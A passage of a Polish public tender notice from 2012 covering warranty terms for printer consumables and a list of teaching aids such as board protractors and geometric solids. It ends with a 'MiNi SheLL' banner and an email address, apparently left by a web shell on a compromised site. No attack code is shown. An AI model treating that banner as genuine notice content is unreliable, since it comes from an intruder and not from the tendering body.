 2. Opakowanie zbiorcze, w których wykonawca dostarczy materiały, muszą zostać  oznaczone nazwą (firmą) i pełnym adresem Wykonawcy.
Warunki gwarancji: 
1.Okres gwarancji na dostarczone materiały eksploatacyjne liczy się od daty odbioru produktu bez zastrzeżeń i trwa do momentu wyczerpania się środka drukującego,
2. W przypadku ujawnienia w okresie gwarancji wad materiałów eksploatacyjnych,  Wykonawca zobowiązany będzie do bezpłatnej ich wymiany na nowe, wolne  od wad, niezwłocznie od momentu zgłoszenia przez Zamawiającego drogą  telefoniczną, faksem lub pisemnie,
3. Wykonawca zobowiązany będzie dostarczyć nowe materiały eksploatacyjne, wolne  od wad, do siedziby Zamawiającego, na własny koszt,
4. W przypadku wymiany materiałów eksploatacyjnych na nowe, wolne od wad, okres  gwarancji biegnie od daty ich odbioru. 
5.  W przypadku dostarczenia przez Wykonawcę materiałów eksploatacyjnych   równoważnych,   Wykonawca gwarantuje:
1)zwrot kosztów naprawy urządzenia, jeżeli bezpośrednią przyczyną awarii będzie
zastosowanie dostarczonego materiału eksploatacyjnego,
2)bezpłatną wymianę urządzenia na nowe, jeżeli bezpośrednią przyczyną awarii
 będzie zastosowanie dostarczonych materiałów eksploatacyjnych, a naprawa 
 nie przywróci jego pełnej użyteczności,
3)w sytuacji, gdy Zamawiający w wyniku zastosowania dostarczonych materiałów
eksploatacyjnych utraci gwarancję producenta urządzeń, Wykonawca przejmie
 wszelkie obowiązki gwarancyjne dotyczące urządzeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> POMOCE DYDAKTYCZNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> POMOCE  DYDAKTYCZNE
Lp.	Nazwa Asortymentu	Jednostka	Maksymalna szacunkowa ilość zamówienia

1. Przybory geometryczne do tablicy szkolnej, w tym
cyrkiel na przyssawce lub szpikulcu	sztuk	8 
2.  ekierka tablicowa z uchwytem, magnetyczna, co najmniej 50cm sztuk	8
3.kątomierz tablicowy z uchwytem, magnetyczny, co najmniej 50cm sztuk	8 
4. linijka tablicowa z uchwytem, magnetyczna, co najmniej 100cm sztuk	8 
5. ZESTAW BRYŁ GEOMETRYCZNYCH
Komplet składający się z co najmniej 10 brył z siatkami do rozkładania.
wysokość brył- co najmniej 10 cm, tworzywo sztuczne
stożek, walec, sześcian, prostopadłościan, graniastosłupy, ostrosłupy itp. 
komplet	8.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com